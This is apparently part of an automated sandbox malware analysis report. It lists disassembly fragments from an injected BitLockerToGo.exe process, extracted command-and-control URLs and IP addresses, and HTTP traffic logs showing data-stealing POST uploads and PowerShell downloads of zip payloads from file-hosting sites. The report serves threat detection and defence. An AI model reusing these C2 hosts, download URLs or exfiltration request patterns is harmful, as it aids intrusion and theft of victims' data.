Source: Binary string: BitLockerToGo.pdb source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+50h] 14_2_004D91C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+54h] 14_2_004D7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004D7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [edi+0Ch] 14_2_004C3260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+54h] 14_2_004D72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004D72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 14_2_004FA479
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp] 14_2_004F9C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then push eax 14_2_004F3CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp+30h] 14_2_004CFCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp+00000200h] 14_2_004CFCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 14_2_004D6CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+70h] 14_2_004D7DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h 14_2_004D7DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+10h] 14_2_004D3DE6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004D2E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp] 14_2_004F7E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+00000820h] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esi+1Ch] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+50h] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [ecx], ax 14_2_004D5871
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 14_2_004CA000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h 14_2_004DD810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, eax 14_2_004C38D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+10h] 14_2_004D30F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 14_2_004D30F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+00000820h] 14_2_004E788A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h 14_2_004DE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004DE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 14_2_004F8880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+00000820h] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esi+1Ch] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+50h] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, word ptr [ebx+eax*4] 14_2_004C8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp] 14_2_004C8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 14_2_004DB920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 14_2_004DB920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 14_2_004D1937
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+50h] 14_2_004E91C8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [00504970h] 14_2_004E41A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then lea ebp, dword ptr [esp+03h] 14_2_004E6210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [edx], 0000h 14_2_004D3A2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h 14_2_004D82CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 14_2_004C3A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 14_2_004DB360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esi+08h] 14_2_004D43E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h 14_2_004E4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [00504A9Ch] 14_2_004E4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 14_2_004F1BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h 14_2_004E33B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 14_2_004CE450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004DEC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 14_2_004D1D52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 14_2_004C2DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 14_2_004E65F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004D3678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 14_2_004D6EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then inc ebx 14_2_004D66B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov al, 01h 14_2_004FA706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, word ptr [esi+eax] 14_2_004F6710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h 14_2_004E37B6

Networking

Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.137 443
Source: C:\Windows\explorer.exe Network Connect: 162.0.235.84 443
Source: C:\Windows\explorer.exe Network Connect: 109.172.114.212 80
Source: C:\Windows\explorer.exe Network Connect: 64.190.113.113 80
Source: C:\Windows\explorer.exe Network Connect: 125.7.253.10 80
Source: C:\Windows\explorer.exe Network Connect: 177.222.41.236 80
Source: C:\Windows\explorer.exe Network Connect: 186.145.236.93 80
Source: C:\Windows\explorer.exe Network Connect: 167.235.128.153 443
Source: C:\Windows\explorer.exe Network Connect: 185.149.100.242 443
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: http://mzxn.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://100xmargin.com/tmp/index.php
Source: Malware configuration extractor URLs: http://wgdnb4rc.xyz/tmp/index.php
Source: Malware configuration extractor URLs: http://olinsw.ws/tmp/index.php
Source: unknown DNS query: name: rentry.co
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 05:30:08 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
Source: Joe Sandbox View IP Address: 77.221.157.163
Source: Joe Sandbox View IP Address: 107.173.160.139
Source: Joe Sandbox View IP Address: 107.173.160.137
Source: Joe Sandbox View ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9363
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 155843
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1263
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1257Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569437Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
